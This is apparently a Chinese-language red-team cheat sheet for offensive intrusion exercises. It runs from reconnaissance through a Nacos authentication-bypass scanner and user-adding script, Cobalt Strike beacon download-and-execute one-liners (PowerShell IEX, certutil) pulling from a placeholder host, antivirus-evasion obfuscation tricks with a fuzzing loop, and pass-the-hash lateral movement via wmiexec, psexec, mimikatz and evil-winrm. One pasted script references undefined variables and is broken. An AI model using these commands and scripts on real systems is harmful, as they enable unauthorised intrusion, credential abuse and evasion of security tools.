外网打点 资产测绘三剑客 https://hunter.qianxin.com/ https://fofa.info/ https://quake.360.cn/
挖掘高价值资产 https://github.com/EdgeSecurityTeam/EHole
ehole重构了一版,需要下载source code进行自编译,realease为旧版本
https://github.com/lijiejie/BBScan
挖掘敏感信息和后台地址
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 Targets: --host [HOST [HOST ...]] Scan several hosts from command line -f TargetFile Load new line delimited targets from TargetFile -d TargetDirectory Load all *.txt files from TargetDirectory --crawler CrawlDirectory Load all *.log crawl files from CrawlDirectory --network MASK Scan all Target/MASK neighbour hosts, should be an integer between 8 and 31 HTTP SCAN: --rule [RuleFileName [RuleFileName ...]] Import specified rule files only. -n, --no-crawl No crawling, sub folders will not be processed -nn, --no-check404 No HTTP 404 existence check --full Process all sub directories Scripts SCAN: --scripts-only Scan with user scripts only --script [ScriptName [ScriptName ...]] Execute specified scripts only --no-scripts Disable all scripts CONCURRENT: -p PROCESS Num of processes running concurrently, 30 by default -t THREADS Num of scan threads for each scan process, 3 by default OTHER: --proxy Proxy Set HTTP proxy server --timeout Timeout Max scan minutes for each target, 10 by default -md Save scan report as markdown format --save-ports PortsDataFile Save open ports to PortsDataFile --debug Show verbose debug info -nnn, --no-browser Do not open web browser to view report -v show program's version number and exit
shiro利用 找到key之后使用常规的漏洞工具无法正常利用,可能这时候很多人就放弃了,由于这两工具缺少部分利用链可能错过漏洞
改用其他工具,优势在于key的数量多,利用链全
建议使用feihong大佬的工具,经典yyds
https://github.com/feihong-cs/ShiroExploit-Deprecated
优先选用第四种方案,右键源代码添加可访问的静态资源
正常执行命令
缺少双因子爆破 许多vpn、邮箱系统没有进行验证限制,可进行暴力破解
如 Global-Protect 谷歌了一波发现其用途是充当防火墙+VPN
由于系统缺少双因子认证,以工号信息为账号尝试爆破,成功获取到VPN的账号密码
连接VPN,进入内网
源代码泄露 通过github筛选目标相关关键字 password xx.com
源代码项目里面可能包含了各种密码,或者是提取指纹寻找源码进行审计
敏感信息泄露 在攻防演练过程中,数据泄露分数占比也是较高的,我们可以多去寻找一些查询系统看看是否存在敏感信息泄露
信息搜集过程中通过360quake的图像预览发现了一个信息查询系统,猜测可能存在信息泄露问题
在前端位置,数据都是加密的
抓取查询数据,查看返回数据包发现是明文显示
webpack接口 在我们渗透过程中,越来越多的系统会采用webpack进行打包,如下图的指纹所示
工具自动化寻找未授权
https://github.com/rtcatc/Packer-Fuzzer
或查看js还原接口
右键源代码——查看检索js——在后面添加.map
1 curl -O http://xx.xx.xx.xx/*.js.map
之后会下载一个js.map,使用reverse-sourcemap进行还原
1 2 npm install --global reverse-sourcemap reverse-sourcemap --output-dir 生成的目录 app.6804b239.js.map
可寻找各种未授权的接口进行进一步的利用,可检索upload、add等关键字
弱口令+后台上传 碰到没有验证码的站,可以尝试进行爆破
成功爆破到账密后,可寻找后台上传接口进行上传
nacos开放公网
https://github.com/Pizz33/nacos_vul
批量验证
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 import requests import urllib3 urllib3.disable_warnings() # 定义自定义路径和Header custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2' proxies = {'http': 'http://127.0.0.1:8080'} header = { "User-Agent": "Nacos-Server", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Pragma": "no-cache", "Te": "trailers", "Cache-Control": "no-cache", } # 从url.txt文件中读取URL列表 with open('url.txt', 'r') as f: urls = f.read().splitlines() # 循环发送GET请求并判断回显结果 for url in urls: full_url = url + custom_path # 拼接完整URL try: response = requests.get(full_url,proxies=proxies, headers=header,verify=False,timeout=2) if response.status_code == 200 and response.content.find(b"pageNumber") != -1: print(f'{url} 存在nacos身份验证绕过漏洞') else: print(f'{url} 不存在nacos身份验证绕过漏洞') except requests.exceptions.RequestException as e: print(f'{url} 访问失败 {e}')
脚本化添加用户
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 import sys import requests from termcolor import colored import urllib3 urllib3.disable_warnings() proxies = {'http': 'http://127.0.0.1:8080'} # 获取命令行参数中的 URL if len(sys.argv) < 2: print("Usage: python test.py <url>") sys.exit(1) url = sys.argv[1] post_url = "/nacos/v1/auth/users" request_url = url + post_url headers = { "User-Agent": "Nacos-Server", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Pragma": "no-cache", "Cache-Control": "no-cache", } data = { "username": "test123", "password": "test123", } response = requests.post(request_url, headers=headers, data=data, proxies=proxies,verify=False) if response.status_code == 200 and response.content.find(b"ok") != -1: print(colored('[*] ' + url + ' 存在nacos身份认证绕过漏洞! ', 'green')) print(colored('已创建用户test123/test123', 'green')) else: print(colored('[-] ' + url + ' 不存在nacos身份认证绕过漏洞! \n', 'red')) threads = [] for url in urls: t = threading.Thread(target=send_request, args=(url,)) threads.append(t) t.start() # 等待所有线程完成 for t in threads: t.join()
任意用户添加登录,配置文件里详情可能含有账户密码等敏感信息
横向利用 cobaltstrike上线 隐藏C2地址 云函数 or cdn
常规上线 1 2 1、powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))" 2、certutil -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe
绕杀软上线 火绒 复制certutil文件
1 copy c:\windows\system32\certutil.exe c:\programdata\a.exe && c:\programdata\a.exe -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe
360 缓存文件还原
1 2 3 4 5 6 ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -DeleteHelloContainer ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deleteEnrollmentServer ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deletePolicyServer ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deleteEccCurve move -deleteEccCurve test.exe
def 中间插入“”字符
1 cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt
通用:可通过py编写脚本 fuzz 字符寻找可绕过的语句
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import osimport randomimport timedef insert_random_chinese_chars (s ): """在字符串s中随机插入中文字符""" chinese_chars = ["。" , "," , "!" ,"》" ,"?" ,"《" , "," , "】" ,"【" ,"}" ,"“" ] n = len (s) insert_positions = sorted (random.sample(range (n), n // 4 )) for pos in reversed (insert_positions): s = s[:pos] + random.choice(chinese_chars) + s[pos:] return s while True : url = "urlcache" url = insert_random_chinese_chars(url) command = f"certutil -{url} -split -f http://x.x.x.x/1.png" print (command) with open ("output.txt" , "a" ) as f: f.write(command + "\n" ) os.system(command) time.sleep(5 )
绕过限制上线 通过漏洞获取到一个webshell之后,在某些环境下可能会限制上传文件的大小和后缀
1 2 certutil -encode beacon.exe out.txt certutil -decode out.txt test.exe
测试找到上传的最大的长度,使用工具进行文本切割
重新整合
1 copy 01.txt + 02.txt + 03.txt + 04.txt + 05.txt + 06.txt + 07.txt + 08.txt + 09.txt + 10.txt out.txt
成功上线
文件上传绕过 通过1day上传文件大概率会碰到被waf拦截的情况,可添加脏字符进行绕过,或者结合分块传输
上传的webshell木马最好做免杀处理,如哥斯拉木马可进行unicode编码,仍可正常执行
绕杀软添加用户 使用bof加载绕过
1 inline-execute bof-net-user-x64.o
密码喷洒 railgun、crackmapexec
获取密码控制机器 135端口 https://github.com/XiaoliChan/wmiexec-Pro
执行命令
1 python wmiexec-pro.py administrator:Admin12345@192.168.186.136 exec-command -command "whoami" -with-output
上传文件
1 python wmiexec-pro.py administrator:Admin12345@192.168.186.136 filetransfer -upload -src-file "/root/Desktop/decode.exe" -dest-file "C:\users\public\test.exe"
wmiexec
1 2 python wmiexec.py -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220 wmiexec.exe -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220
这里过不去的需要在目标机器上开启注册表
1 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
WMIHACKER
https://github.com/rootclay/WMIHACKER
1 cscript WMIHACKER.vbs /cmd 192.168.10.90 administrator "123456" "ipconfig" 1
sharpwmi
个人常用的一款,可以上传文件,但是文件大小限制512kb内
https://github.com/QAX-A-Team/sharpwmi
https://github.com/idiotc4t/sharpwmi
1 2 3 4 5 sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoami sharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoami sharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:\beacon.exe sharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoami sharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:\beacon.exe
445端口 smbexec
1 smbexec.exe administrator:"mima"@10.61.9.46
psexec
这里使用的impacket工具包里的,微软自带的psexec不能使用hash进行传递
1 2 net use \\10.61.9.45\ipc$ "123456" /user:administrator psexec.exe \\10.61.9.45 -u administrator -p "mima" whoami
1 2 python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100 psexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100
mmcexec
1 mmcexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100
3389端口 修改注册表
1 REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
mimikatz进行hash传递,之后会弹出一个框,填入相应的IP即可
1 2 privilege::debug sekurlsa::pth /user:dyy /domain:. /ntlm::2687cb433215956d4ededb0d00334118 "/run:mstsc.exe /restrictedadmin"
5985端口 evil-winrm
这里先安装ruby环境,https://rubyinstaller.org
1 evil-winrm -i 192.168.0.100 -u administrator -H ccef208c6485269c20db2cad21734fe7
报错异常情况
1 2 3 4 5 6 7 8 9 10 错误号5 ,拒绝访问:很可能你使⽤的⽤户不是管理员权限的(#先提升权限) 错误号51 ,Windows⽆法找到⽹络路径(#⽹络有问题) 错误号53 ,找不到⽹络路径:ip地址错误;⽬标末开机(#⽬标lanmanserver服务未启动;⽬标有 防⽕墙(端⼝过滤) 错误号67 ,找不到⽹络名(#你的lanmanworkstation服务末启动;⽬标删除了ipc$) 错误号1219 ,提供的凭据与⼰存在的凭据集冲突(#你已经和对⽅建⽴了⼀个ipc$,请删除在连) 错误号1326 ,未知的⽤户名或错误密码(#原因很明显) 错误号1792 ,试图登录,但是⽹络登录服务没有启动(#⽬标NetLogon服务末启动。(连接域控 会出现此情况) 错误号2242 ,此⽤户的密码⼰经过期(#⽬标有帐号策略,强制定期要求更改密码)
